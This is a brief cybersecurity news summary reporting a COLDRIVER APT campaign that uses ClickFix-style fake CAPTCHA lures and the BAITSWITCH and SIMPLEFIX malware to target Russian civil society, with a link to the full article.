The Russian APT group COLDRIVER has launched a new series of ClickFix-style attacks involving BAITSWITCH and SIMPLEFIX malware families. These sophisticated campaigns focus on targeting civil society in Russia and employ multi-stage infection techniques. #COLDRIVER #ClickFix #BAITSWITCH #SIMPLEFIX
Keypoints
- COLDRIVER is a Russia-linked APT known for targeting NGOs, human rights groups, and exiles since 2019.
- The new attack chain uses fake CAPTCHA prompts to trick users into executing malicious DLLs and PowerShell scripts.
- SIMPLEFIX backdoor communicates with C2 servers to run commands and exfiltrate data from infected systems.
- Zscaler reports that the ClickFix technique remains effective despite not being new or highly advanced.
- Other threat groups like BO Team and Bearlyfy have targeted Russian companies with different malware, including ZeronetKit and ransomware.
Read More: https://thehackernews.com/2025/09/new-coldriver-malware-campaign-joins-bo.html